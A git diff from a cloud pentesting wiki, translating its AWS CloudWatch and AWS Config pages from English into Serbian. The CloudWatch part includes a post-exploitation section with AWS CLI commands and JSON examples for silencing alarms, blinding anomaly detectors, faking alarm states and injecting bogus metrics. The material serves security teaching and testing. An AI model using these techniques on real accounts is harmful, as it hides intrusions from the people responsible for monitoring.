-| **Log Stream**           | A sequence of **log events** that share the **same source**                                                                                                |
-| **Subscription Filters** | Define a **filter pattern that matches events** in a particular log group, send them to Kinesis Data Firehose stream, Kinesis stream, or a Lambda function |
+| **Log Stream**           | Sekvenca **log događaja** koji dele **isti izvor**                                                                                                |
+| **Filteri Pretplate**    | Definišu **filter obrazac koji odgovara događajima** u određenoj log grupi, šalju ih u Kinesis Data Firehose stream, Kinesis stream ili Lambda funkciju |
 
-### CloudWatch Monitoring & Events
+### CloudWatch Nadzor & Događaji
 
-CloudWatch **basic** aggregates data **every 5min** (the **detailed** one does that **every 1 min**). After the aggregation, it **checks the thresholds of the alarms** in case it needs to trigger one.\
-In that case, CLoudWatch can be prepared to send an event and perform some automatic actions (AWS lambda functions, SNS topics, SQS queues, Kinesis Streams)
+CloudWatch **osnovni** agregira podatke **svakih 5 minuta** (detaljni to radi **svakih 1 minut**). Nakon agregacije, **proverava pragove alarma** u slučaju da treba da aktivira jedan.\
+U tom slučaju, CloudWatch može biti spreman da pošalje događaj i izvrši neke automatske akcije (AWS lambda funkcije, SNS teme, SQS redovi, Kinesis Streams)
 
-### Agent Installation
+### Instalacija Agenta
 
-You can install agents inside your machines/containers to automatically send the logs back to CloudWatch.
+Možete instalirati agente unutar vaših mašina/kontejnera kako biste automatski slali logove nazad u CloudWatch.
 
-- **Create** a **role** and **attach** it to the **instance** with permissions allowing CloudWatch to collect data from the instances in addition to interacting with AWS systems manager SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
-- **Download** and **install** the **agent** onto the EC2 instance ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). You can download it from inside the EC2 or install it automatically using AWS System Manager selecting the package AWS-ConfigureAWSPackage
-- **Configure** and **start** the CloudWatch Agent
+- **Kreirajte** **ulogu** i **prikačite** je na **instancu** sa dozvolama koje omogućavaju CloudWatch-u da prikuplja podatke iz instanci pored interakcije sa AWS sistem menadžerom SSM (CloudWatchAgentAdminPolicy & AmazonEC2RoleforSSM)
+- **Preuzmite** i **instalirajte** **agenta** na EC2 instancu ([https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip](https://s3.amazonaws.com/amazoncloudwatch-agent/linux/amd64/latest/AmazonCloudWatchAgent.zip)). Možete ga preuzeti iznutra EC2 ili ga automatski instalirati koristeći AWS System Manager birajući paket AWS-ConfigureAWSPackage
+- **Konfigurišite** i **pokrenite** CloudWatch Agent
 
-A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.
-
-## Enumeration
+Log grupa ima mnogo stream-ova. Stream ima mnogo događaja. I unutar svakog stream-a, događaji su zagarantovani da budu u redosledu.
 
+## Enumeracija
 ```bash
 # Dashboards #
 
@@ -213,250 +212,217 @@ aws events describe-event-source --name aws events list-replays
 aws events list-api-destinations
 aws events list-event-buses
 ```
-
 ## Post-Exploitation / Bypass
 
 ### **`cloudwatch:DeleteAlarms`,`cloudwatch:PutMetricAlarm` , `cloudwatch:PutCompositeAlarm`**
 
-An attacker with this permissions could significantly undermine an organization's monitoring and alerting infrastructure. By deleting existing alarms, an attacker could disable crucial alerts that notify administrators of critical performance issues, security breaches, or operational failures. Furthermore, by creating or modifying metric alarms, the attacker could also mislead administrators with false alerts or silence legitimate alarms, effectively masking malicious activities and preventing timely responses to actual incidents.
-
-In addition, with the **`cloudwatch:PutCompositeAlarm`** permission, an attacker would be able to create a loop or cycle of composite alarms, where composite alarm A depends on composite alarm B, and composite alarm B also depends on composite alarm A. In this scenario, it is not possible to delete any composite alarm that is part of the cycle because there is always still a composite alarm that depends on that alarm that you want to delete.
+Napadač sa ovim dozvolama mogao bi značajno oslabiti infrastrukturu za praćenje i obaveštavanje organizacije. Brisanjem postojećih alarma, napadač bi mogao onemogućiti ključne obaveštenja koja obaveštavaju administratore o kritičnim problemima sa performansama, bezbednosnim povredama ili operativnim neuspesima. Pored toga, kreiranjem ili modifikovanjem metrik alarmâ, napadač bi takođe mogao da obmanjuje administratore lažnim obaveštenjima ili da utiša legitimne alarme, efikasno prikrivajući zlonamerne aktivnosti i sprečavajući pravovremene odgovore na stvarne incidente.
 
+Pored toga, sa dozvolom **`cloudwatch:PutCompositeAlarm`**, napadač bi mogao da kreira petlju ili ciklus kompozitnih alarma, gde kompozitni alarm A zavisi od kompozitnog alarma B, a kompozitni alarm B takođe zavisi od kompozitnog alarma A. U ovom scenariju, nije moguće obrisati nijedan kompozitni alarm koji je deo ciklusa jer uvek postoji kompozitni alarm koji zavisi od alarma koji želite da obrišete.
 ```bash
 aws cloudwatch put-metric-alarm --cli-input-json  | --alarm-name  --comparison-operator  --evaluation-periods  [--datapoints-to-alarm ] [--threshold ] [--alarm-description ] [--alarm-actions ] [--metric-name ] [--namespace ] [--statistic ] [--dimensions ] [--period ]
 aws cloudwatch delete-alarms --alarm-names 
 aws cloudwatch put-composite-alarm --alarm-name  --alarm-rule  [--no-actions-enabled | --actions-enabled [--alarm-actions ] [--insufficient-data-actions ] [--ok-actions ] ]
 ```
+Следећи пример показује како учинити метрику аларма неефикасном:
 
-The following example shows how to make a metric alarm ineffective:
-
-- This metric alarm monitors the average CPU utilization of a specific EC2 instance, evaluates the metric every 300 seconds and requires 6 evaluation periods (30 minutes total). If the average CPU utilization exceeds 60% for at least 4 of these periods, the alarm will trigger and send a notification to the specified SNS topic.
-- By modifying the Threshold to be more than 99%, setting the Period to 10 seconds, the Evaluation Periods to 8640 (since 8640 periods of 10 seconds equal 1 day), and the Datapoints to Alarm to 8640 as well, it would be necessary for the CPU utilization to be over 99% every 10 seconds throughout the entire 24-hour period to trigger an alarm.
+- Ова метрика аларма прати просечну CPU употребу одређеног EC2 инстанце, процењује метрику сваког 300 секунди и захтева 6 периода процене (укупно 30 минута). Ако просечна CPU употреба пређе 60% у најмање 4 од ових периода, аларм ће се активирати и послати обавештење на одређену SNS тему.
+- Изменом Прагa да буде више од 99%, постављањем Периода на 10 секунди, Периода Процене на 8640 (пошто 8640 периода од 10 секунди једнако је 1 дан), и Датапоинтс на Аларм на 8640, било би неопходно да CPU употреба буде преко 99% сваког 10 секунди током целог 24-часовног периода да би се активирао аларм.
 
 {{#tabs }}
 {{#tab name="Original Metric Alarm" }}
-
 ```json
 {
-  "Namespace": "AWS/EC2",
-  "MetricName": "CPUUtilization",
-  "Dimensions": [
-    {
-      "Name": "InstanceId",
-      "Value": "i-01234567890123456"
-    }
-  ],
-  "AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"],
-  "ComparisonOperator": "GreaterThanThreshold",
-  "DatapointsToAlarm": 4,
-  "EvaluationPeriods": 6,
-  "Period": 300,
-  "Statistic": "Average",
-  "Threshold": 60,
-  "AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%",
-  "AlarmName": "EC2 instance i-01234567890123456 CPU Utilization"
+"Namespace": "AWS/EC2",
+"MetricName": "CPUUtilization",
+"Dimensions": [
+{
+"Name": "InstanceId",
+"Value": "i-01234567890123456"
+}
+],
+"AlarmActions": ["arn:aws:sns:us-east-1:123456789012:example_sns"],
+"ComparisonOperator": "GreaterThanThreshold",
+"DatapointsToAlarm": 4,
+"EvaluationPeriods": 6,
+"Period": 300,
+"Statistic": "Average",
+"Threshold": 60,
+"AlarmDescription": "CPU Utilization of i-01234567890123456 over 60%",
+"AlarmName": "EC2 instance i-01234567890123456 CPU Utilization"
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="Modified Metric Alarm" }}
-
+{{#tab name="Izmenjeni Metrika Alarm" }}
 ```json
 {
-  "Namespace": "AWS/EC2",
-  "MetricName": "CPUUtilization",
-  "Dimensions": [
-    {
-      "Name": "InstanceId",
-      "Value": "i-0645d6d414dadf9f8"
-    }
-  ],
-  "AlarmActions": [],
-  "ComparisonOperator": "GreaterThanThreshold",
-  "DatapointsToAlarm": 8640,
-  "EvaluationPeriods": 8640,
-  "Period": 10,
-  "Statistic": "Average",
-  "Threshold": 99,
-  "AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold",
-  "AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization"
+"Namespace": "AWS/EC2",
+"MetricName": "CPUUtilization",
+"Dimensions": [
+{
+"Name": "InstanceId",
+"Value": "i-0645d6d414dadf9f8"
+}
+],
+"AlarmActions": [],
+"ComparisonOperator": "GreaterThanThreshold",
+"DatapointsToAlarm": 8640,
+"EvaluationPeriods": 8640,
+"Period": 10,
+"Statistic": "Average",
+"Threshold": 99,
+"AlarmDescription": "CPU Utilization of i-01234567890123456 with 60% as threshold",
+"AlarmName": "Instance i-0645d6d414dadf9f8 CPU Utilization"
 }
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
+**Potencijalni uticaj**: Nedostatak obaveštenja za kritične događaje, potencijalni neotkriveni problemi, lažne alarme, potiskivanje stvarnih alarma i potencijalno propuštene detekcije stvarnih incidenata.
 
 ### **`cloudwatch:DeleteAlarmActions`, `cloudwatch:EnableAlarmActions` , `cloudwatch:SetAlarmState`**
 
-By deleting alarm actions, the attacker could prevent critical alerts and automated responses from being triggered when an alarm state is reached, such as notifying administrators or triggering auto-scaling activities. Enabling or re-enabling alarm actions inappropriately could also lead to unexpected behaviors, either by reactivating previously disabled actions or by modifying which actions are triggered, potentially causing confusion and misdirection in incident response.
+Brisanjem akcija alarma, napadač bi mogao sprečiti aktivaciju kritičnih obaveštenja i automatskih odgovora kada se dostigne stanje alarma, kao što je obaveštavanje administratora ili pokretanje automatskih aktivnosti skaliranja. Neprikladno omogućavanje ili ponovo omogućavanje akcija alarma takođe može dovesti do neočekivanih ponašanja, bilo ponovnim aktiviranjem prethodno onemogućenih akcija ili modifikovanjem koje se akcije aktiviraju, potencijalno uzrokujući konfuziju i pogrešne smernice u odgovoru na incidente.
 
-In addition, an attacker with the permission could manipulate alarm states, being able to create false alarms to distract and confuse administrators, or silence genuine alarms to hide ongoing malicious activities or critical system failures.
-
-- If you use **`SetAlarmState`** on a composite alarm, the composite alarm is not guaranteed to return to its actual state. It returns to its actual state only once any of its children alarms change state. It is also reevaluated if you update its configuration.
+Pored toga, napadač sa dozvolom mogao bi manipulisati stanjima alarma, imajući mogućnost da kreira lažne alarme kako bi odvratio i zbunio administratore, ili da utiša stvarne alarme kako bi sakrio tekuće zle aktivnosti ili kritične kvarove sistema.
 
+- Ako koristite **`SetAlarmState`** na kompozitnom alarmu, kompozitni alarm nije garantovan da će se vratiti u svoje stvarno stanje. Vraća se u svoje stvarno stanje samo kada se bilo koji od njegovih alarmnih podstanja promeni. Takođe se ponovo procenjuje ako ažurirate njegovu konfiguraciju.
 ```bash
 aws cloudwatch disable-alarm-actions --alarm-names 
 aws cloudwatch enable-alarm-actions --alarm-names 
 aws cloudwatch set-alarm-state --alarm-name  --state-value  --state-reason  [--state-reason-data ]
 ```
-
-**Potential Impact**: Lack of notifications for critical events, potential undetected issues, false alerts, suppress genuine alerts and potentially missed detections of real incidents.
+**Potencijalni Uticaj**: Nedostatak obaveštenja za kritične događaje, potencijalni neotkriveni problemi, lažne alarme, potiskivanje stvarnih alarma i potencijalno propuštene detekcije pravih incidenata.
 
 ### **`cloudwatch:DeleteAnomalyDetector`, `cloudwatch:PutAnomalyDetector`**
 
-An attacker would be able to compromise the ability of detection and respond to unusual patterns or anomalies in metric data. By deleting existing anomaly detectors, an attacker could disable critical alerting mechanisms; and by creating or modifying them, it would be able either to misconfigure or create false positives in order to distract or overwhelm the monitoring.
-
+Napadač bi mogao da kompromituje sposobnost detekcije i odgovora na neobične obrasce ili anomalije u metrikama podataka. Brisanjem postojećih detektora anomalija, napadač bi mogao da onemogući kritične mehanizme za obaveštavanje; a kreiranjem ili modifikovanjem, mogao bi ili da pogrešno konfiguriše ili stvara lažne pozitivne rezultate kako bi skrenuo pažnju ili preplavio monitoring.
 ```bash
 aws cloudwatch delete-anomaly-detector [--cli-input-json  | --namespace  --metric-name  --dimensions  --stat ]
 aws cloudwatch put-anomaly-detector [--cli-input-json  | --namespace  --metric-name  --dimensions  --stat  --configuration  --metric-characteristics ]
 ```
-
-The following example shows how to make a metric anomaly detector ineffective. This metric anomaly detector monitors the average CPU utilization of a specific EC2 instance, and just by adding the “ExcludedTimeRanges” parameter with the desired time range, it would be enough to ensure that the anomaly detector does not analyze or alert on any relevant data during that period.
+Sledeći primer pokazuje kako učiniti detektor anomalija metrika neefikasnim. Ovaj detektor anomalija metrika prati prosečnu CPU upotrebu specifične EC2 instance, i samo dodavanjem parametra “ExcludedTimeRanges” sa željenim vremenskim opsegom, bilo bi dovoljno da se osigura da detektor anomalija ne analizira ili ne upozorava na bilo koje relevantne podatke tokom tog perioda.
 
 {{#tabs }}
 {{#tab name="Original Metric Anomaly Detector" }}
-
 ```json
 {
-  "SingleMetricAnomalyDetector": {
-    "Namespace": "AWS/EC2",
-    "MetricName": "CPUUtilization",
-    "Stat": "Average",
-    "Dimensions": [
-      {
-        "Name": "InstanceId",
-        "Value": "i-0123456789abcdefg"
-      }
-    ]
-  }
+"SingleMetricAnomalyDetector": {
+"Namespace": "AWS/EC2",
+"MetricName": "CPUUtilization",
+"Stat": "Average",
+"Dimensions": [
+{
+"Name": "InstanceId",
+"Value": "i-0123456789abcdefg"
+}
+]
+}
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="Modified Metric Anomaly Detector" }}
-
+{{#tab name="Modifikovani Detektor Anomalija Metrike" }}
 ```json
 {
-  "SingleMetricAnomalyDetector": {
-    "Namespace": "AWS/EC2",
-    "MetricName": "CPUUtilization",
-    "Stat": "Average",
-    "Dimensions": [
-      {
-        "Name": "InstanceId",
-        "Value": "i-0123456789abcdefg"
-      }
-    ]
-  },
-  "Configuration": {
-    "ExcludedTimeRanges": [
-      {
-        "StartTime": "2023-01-01T00:00:00Z",
-        "EndTime": "2053-01-01T23:59:59Z"
-      }
-    ],
-    "Timezone": "Europe/Madrid"
-  }
+"SingleMetricAnomalyDetector": {
+"Namespace": "AWS/EC2",
+"MetricName": "CPUUtilization",
+"Stat": "Average",
+"Dimensions": [
+{
+"Name": "InstanceId",
+"Value": "i-0123456789abcdefg"
+}
+]
+},
+"Configuration": {
+"ExcludedTimeRanges": [
+{
+"StartTime": "2023-01-01T00:00:00Z",
+"EndTime": "2053-01-01T23:59:59Z"
+}
+],
+"Timezone": "Europe/Madrid"
+}
 }
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
-**Potential Impact**: Direct effect in the detection of unusual patterns or security threats.
+**Potencijalni uticaj**: Direktan efekat na detekciju neobičnih obrazaca ili bezbednosnih pretnji.
 
 ### **`cloudwatch:DeleteDashboards`, `cloudwatch:PutDashboard`**
 
-An attacker would be able to compromise the monitoring and visualization capabilities of an organization by creating, modifying or deleting its dashboards. This permissions could be leveraged to remove critical visibility into the performance and health of systems, alter dashboards to display incorrect data or hide malicious activities.
-
+Napadač bi mogao da kompromituje mogućnosti praćenja i vizualizacije organizacije kreiranjem, modifikovanjem ili brisanjem svojih kontrolnih tabli. Ove dozvole bi mogle biti iskorišćene za uklanjanje kritične vidljivosti u performansama i zdravlju sistema, menjanje kontrolnih tabli da prikazuju netačne podatke ili skrivanje zlonamernih aktivnosti.
 ```bash
 aws cloudwatch delete-dashboards --dashboard-names 
 aws cloudwatch put-dashboard --dashboard-name  --dashboard-body 
 ```
-
-**Potential Impact**: Loss of monitoring visibility and misleading information.
+**Potencijalni Uticaj**: Gubitak vidljivosti nadzorom i obmanjujuće informacije.
 
 ### **`cloudwatch:DeleteInsightRules`, `cloudwatch:PutInsightRule` ,`cloudwatch:PutManagedInsightRule`**
 
-Insight rules are used to detect anomalies, optimize performance, and manage resources effectively. By deleting existing insight rules, an attacker could remove critical monitoring capabilities, leaving the system blind to performance issues and security threats. Additionally, an attacker could create or modify insight rules to generate misleading data or hide malicious activities, leading to incorrect diagnostics and inappropriate responses from the operations team.
-
+Insight pravila se koriste za otkrivanje anomalija, optimizaciju performansi i efikasno upravljanje resursima. Brisanjem postojećih insight pravila, napadač bi mogao ukloniti kritične mogućnosti nadzora, ostavljajući sistem slepim na probleme sa performansama i bezbednosne pretnje. Pored toga, napadač bi mogao kreirati ili modifikovati insight pravila kako bi generisao obmanjujuće podatke ili sakrio zlonamerne aktivnosti, što bi dovelo do netačnih dijagnostika i neadekvatnih odgovora operativnog tima.
 ```bash
 aws cloudwatch delete-insight-rules --rule-names 
 aws cloudwatch put-insight-rule --rule-name  --rule-definition  [--rule-state ]
 aws cloudwatch put-managed-insight-rules --managed-rules 
 ```
-
-**Potential Impact**: Difficulty to detect and respond to performance issues and anomalies, misinformed decision-making and potentially hiding malicious activities or system failures.
+**Potencijalni uticaj**: Teškoće u otkrivanju i reagovanju na probleme sa performansama i anomalijama, pogrešno informisano donošenje odluka i potencijalno prikrivanje zlonamernih aktivnosti ili kvarova sistema.
 
 ### **`cloudwatch:DisableInsightRules`, `cloudwatch:EnableInsightRules`**
 
-By disabling critical insight rules, an attacker could effectively blind the organization to key performance and security metrics. Conversely, by enabling or configuring misleading rules, it could be possible to generate false data, create noise, or hide malicious activity.
-
+Onemogućavanjem kritičnih pravila uvida, napadač bi mogao efikasno da zaslepi organizaciju za ključne metrike performansi i bezbednosti. S druge strane, omogućavanjem ili konfigurisanjem obmanjujućih pravila, moglo bi biti moguće generisati lažne podatke, stvoriti šum ili prikriti zlonamerne aktivnosti.
 ```bash
 aws cloudwatch disable-insight-rules --rule-names 
 aws cloudwatch enable-insight-rules --rule-names 
 ```
-
-**Potential Impact**: Confusion among the operations team, leading to delayed responses to actual issues and unnecessary actions based on false alerts.
+**Potencijalni uticaj**: Zbunjenost među operativnim timom, što dovodi do kašnjenja u odgovorima na stvarne probleme i nepotrebnih akcija zasnovanih na lažnim upozorenjima.
 
 ### **`cloudwatch:DeleteMetricStream` , `cloudwatch:PutMetricStream` , `cloudwatch:PutMetricData`**
 
-An attacker with the **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** permissions would be able to create and delete metric data streams, compromising the security, monitoring and data integrity:
+Napadač sa **`cloudwatch:DeleteMetricStream`** , **`cloudwatch:PutMetricStream`** dozvolama mogao bi da kreira i briše tokove metrika, ugrožavajući bezbednost, nadzor i integritet podataka:
 
-- **Create malicious streams**: Create metric streams to send sensitive data to unauthorized destinations.
-- **Resource manipulation**: The creation of new metric streams with excessive data could produce a lot of noise, causing incorrect alerts, masking true issues.
-- **Monitoring disruption**: Deleting metric streams, attackers would disrupt the continuos flow of monitoring data. This way, their malicious activities would be effectively hidden.
-
-Similarly, with the **`cloudwatch:PutMetricData`** permission, it would be possible to add data to a metric stream. This could lead to a DoS because of the amount of improper data added, making it completely useless.
+- **Kreiranje zlonamernih tokova**: Kreirati tokove metrika za slanje osetljivih podataka na neovlašćene destinacije.
+- **Manipulacija resursima**: Kreiranje novih tokova metrika sa prekomernim podacima moglo bi proizvesti mnogo šuma, uzrokujući netačna upozorenja, prikrivajući prave probleme.
+- **Prekid nadzora**: Brisanjem tokova metrika, napadači bi prekinuli kontinuirani tok podataka za nadzor. Na taj način, njihove zlonamerne aktivnosti bi bile efikasno skrivene.
 
+Slično tome, sa dozvolom **`cloudwatch:PutMetricData`**, bilo bi moguće dodati podatke u tok metrika. To bi moglo dovesti do DoS-a zbog količine nepravilnih podataka koji su dodati, čineći ga potpuno beskorisnim.
 ```bash
 aws cloudwatch delete-metric-stream --name 
 aws cloudwatch put-metric-stream --name  [--include-filters ] [--exclude-filters ] --firehose-arn  --role-arn  --output-format 
 aws cloudwatch put-metric-data --namespace  [--metric-data ] [--metric-name ] [--timestamp ] [--unit ] [--value ] [--dimensions ]
 ```
-
-Example of adding data corresponding to a 70% of a CPU utilization over a given EC2 instance:
-
+Primer dodavanja podataka koji odgovaraju 70% iskorišćenosti CPU-a na datom EC2 instancu:
 ```bash
 aws cloudwatch put-metric-data --namespace "AWS/EC2" --metric-name "CPUUtilization" --value 70 --unit "Percent" --dimensions "InstanceId=i-0123456789abcdefg"
 ```
-
-**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents, resource manipulation and costs increasing due to the creation of excessive metric streams.
+**Potencijalni Uticaj**: Poremećaj u protoku podataka za praćenje, što utiče na otkrivanje anomalija i incidenata, manipulaciju resursima i povećanje troškova zbog kreiranja prekomernih tokova metrika.
 
 ### **`cloudwatch:StopMetricStreams`, `cloudwatch:StartMetricStreams`**
 
-An attacker would control the flow of the affected metric data streams (every data stream if there is no resource restriction). With the permission **`cloudwatch:StopMetricStreams`**, attackers could hide their malicious activities by stopping critical metric streams.
-
+Napadač bi kontrolisao protok podataka o metrikama koji su pogođeni (svaki tok podataka ako ne postoji ograničenje resursa). Sa dozvolom **`cloudwatch:StopMetricStreams`**, napadači bi mogli da sakriju svoje zlonamerne aktivnosti zaustavljanjem kritičnih tokova metrika.
 ```bash
 aws cloudwatch stop-metric-streams --names 
 aws cloudwatch start-metric-streams --names 
 ```
-
-**Potential Impact**: Disruption in the flow of monitoring data, impacting the detection of anomalies and incidents.
+**Potencijalni uticaj**: Poremećaj u protoku podataka za praćenje, što utiče na otkrivanje anomalija i incidenata.
 
 ### **`cloudwatch:TagResource`, `cloudwatch:UntagResource`**
 
-An attacker would be able to add, modify, or remove tags from CloudWatch resources (currently only alarms and Contributor Insights rules). This could disrupting your organization's access control policies based on tags.
-
+Napadač bi mogao da doda, izmeni ili ukloni oznake sa CloudWatch resursa (trenutno samo alarma i pravila za Contributor Insights). Ovo bi moglo poremetiti politike kontrole pristupa vaše organizacije zasnovane na oznakama.
 ```bash
 aws cloudwatch tag-resource --resource-arn  --tags 
 aws cloudwatch untag-resource --resource-arn  --tag-keys 
 ```
+**Potencijalni Uticaj**: Poremećaj politika pristupa zasnovanih na oznakama.
 
-**Potential Impact**: Disruption of tag-based access control policies.
-
-## References
+## Reference
 
 - [https://cloudsecdocs.com/aws/services/logging/cloudwatch/](https://cloudsecdocs.com/aws/services/logging/cloudwatch/#general-info)
 - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazoncloudwatch.html)
 - [https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric](https://docs.aws.amazon.com/es_es/AmazonCloudWatch/latest/monitoring/cloudwatch_concepts.html#Metric)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
index f2ab3c4c5..5414d7483 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-config-enum.md
@@ -4,47 +4,43 @@
 
 ## AWS Config
 
-AWS Config **capture resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item**, a CI. This service is **region specific**.
+AWS Config **prikuplja promene resursa**, tako da se svaka promena na resursu koji podržava Config može zabeležiti, što će **zabeležiti šta se promenilo zajedno sa drugim korisnim metapodacima, sve sadržano u datoteci poznatoj kao konfiguracijski element**, CI. Ova usluga je **specifična za region**.
 
-A configuration item or **CI** as it's known, is a key component of AWS Config. It is comprised of a JSON file that **holds the configuration information, relationship information and other metadata as a point-in-time snapshot view of a supported resource**. All the information that AWS Config can record for a resource is captured within the CI. A CI is created **every time** a supported resource has a change made to its configuration in any way. In addition to recording the details of the affected resource, AWS Config will also record CIs for any directly related resources to ensure the change did not affect those resources too.
+Konfiguracijski element ili **CI**, kako se naziva, je ključna komponenta AWS Config-a. Sastoji se od JSON datoteke koja **sadrži informacije o konfiguraciji, informacije o odnosima i druge metapodatke kao trenutni pregled podržanog resursa**. Sve informacije koje AWS Config može zabeležiti za resurs su zabeležene unutar CI. CI se kreira **svaki put** kada se na podržanom resursu izvrši promena u njegovoj konfiguraciji na bilo koji način. Pored zabeležavanja detalja o pogođenom resursu, AWS Config će takođe zabeležiti CIs za sve direktno povezane resurse kako bi se osiguralo da promena nije uticala i na te resurse.
 
-- **Metadata**: Contains details about the configuration item itself. A version ID and a configuration ID, which uniquely identifies the CI. Ither information can include a MD5Hash that allows you to compare other CIs already recorded against the same resource.
-- **Attributes**: This holds common **attribute information against the actual resource**. Within this section, we also have a unique resource ID, and any key value tags that are associated to the resource. The resource type is also listed. For example, if this was a CI for an EC2 instance, the resource types listed could be the network interface, or the elastic IP address for that EC2 instance
-- **Relationships**: This holds information for any connected **relationship that the resource may have**. So within this section, it would show a clear description of any relationship to other resources that this resource had. For example, if the CI was for an EC2 instance, the relationship section may show the connection to a VPC along with the subnet that the EC2 instance resides in.
-- **Current configuration:** This will display the same information that would be generated if you were to perform a describe or list API call made by the AWS CLI. AWS Config uses the same API calls to get the same information.
-- **Related events**: This relates to AWS CloudTrail. This will display the **AWS CloudTrail event ID that is related to the change that triggered the creation of this CI**. There is a new CI made for every change made against a resource. As a result, different CloudTrail event IDs will be created.
+- **Metapodaci**: Sadrži detalje o samom konfiguracijskom elementu. ID verzije i ID konfiguracije, koji jedinstveno identifikuje CI. Druge informacije mogu uključivati MD5Hash koji vam omogućava da uporedite druge CI već zabeležene protiv istog resursa.
+- **Atributi**: Ovo sadrži zajedničke **informacije o atributima u odnosu na stvarni resurs**. U okviru ovog odeljka, takođe imamo jedinstveni ID resursa i sve ključne oznake koje su povezane sa resursom. Tip resursa je takođe naveden. Na primer, ako je ovo bio CI za EC2 instancu, tipovi resursa koji su navedeni mogli bi biti mrežni interfejs ili elastična IP adresa za tu EC2 instancu.
+- **Odnos**: Ovo sadrži informacije o bilo kojem povezanom **odnosu koji resurs može imati**. Dakle, unutar ovog odeljka, prikazivaće jasnu opis bilo kojeg odnosa sa drugim resursima koje je ovaj resurs imao. Na primer, ako je CI bio za EC2 instancu, odeljak o odnosima može prikazati vezu sa VPC-om zajedno sa podmrežom u kojoj se EC2 instanca nalazi.
+- **Trenutna konfiguracija:** Ovo će prikazati iste informacije koje bi bile generisane ako biste izvršili opis ili listu API poziva napravljenih od strane AWS CLI. AWS Config koristi iste API pozive da dobije iste informacije.
+- **Povezani događaji**: Ovo se odnosi na AWS CloudTrail. Ovo će prikazati **AWS CloudTrail ID događaja koji je povezan sa promenom koja je pokrenula kreiranje ovog CI**. Postoji novi CI napravljen za svaku promenu izvršenu na resursu. Kao rezultat, različiti CloudTrail ID događaja će biti kreirani.
 
-**Configuration History**: It's possible to obtain the configuration history of resources thanks to the configurations items. A configuration history is delivered every 6 hours and contains all CI's for a particular resource type.
+**Istorija konfiguracije**: Moguće je dobiti istoriju konfiguracije resursa zahvaljujući konfiguracijskim elementima. Istorija konfiguracije se isporučuje svake 6 sati i sadrži sve CI za određeni tip resursa.
 
-**Configuration Streams**: Configuration items are sent to an SNS Topic to enable analysis of the data.
+**Konfiguracijski tokovi**: Konfiguracijski elementi se šalju na SNS temu kako bi omogućili analizu podataka.
 
-**Configuration Snapshots**: Configuration items are used to create a point in time snapshot of all supported resources.
+**Konfiguracijski snimci**: Konfiguracijski elementi se koriste za kreiranje trenutnog snimka svih podržanih resursa.
 
-**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for this service principle, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account.
+**S3 se koristi za skladištenje** datoteka istorije konfiguracije i bilo kojih konfiguracijskih snimaka vaših podataka unutar jedne kante, koja je definisana unutar snimača konfiguracije. Ako imate više AWS naloga, možda ćete želeti da agregirate datoteke istorije konfiguracije u istu S3 kantu za vaš primarni nalog. Međutim, moraćete da dodelite pristup za pisanje za ovaj servisni princip, config.amazonaws.com, i vaše sekundarne naloge sa pristupom za pisanje u S3 kantu u vašem primarnom nalogu.
 
-### Functioning
+### Funkcionisanje
 
-- When make changes, for example to security group or bucket access control list —> fire off as an Event picked up by AWS Config
-- Stores everything in S3 bucket
-- Depending on the setup, as soon as something changes it could trigger a lambda function OR schedule lambda function to periodically look through the AWS Config settings
-- Lambda feeds back to Config
-- If rule has been broken, Config fires up an SNS
+- Kada izvršite promene, na primer, na sigurnosnoj grupi ili listi kontrole pristupa kante —> pokreće se kao događaj koji preuzima AWS Config
+- Skladišti sve u S3 kanti
+- U zavisnosti od postavki, čim se nešto promeni, može pokrenuti lambda funkciju ili zakazati lambda funkciju da periodično pregleda AWS Config postavke
+- Lambda se vraća Config-u
+- Ako je pravilo prekršeno, Config pokreće SNS
 
 ![](<../../../../images/image (126).png>)
 
-### Config Rules
+### Config pravila
 
-Config rules are a great way to help you **enforce specific compliance checks** **and controls across your resources**, and allows you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
-AWS have a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted. This checks whether storage encryption is activated by your RDS database instances. Encrypted-volumes. This checks to see if any EBS volumes that have an attached state are encrypted.
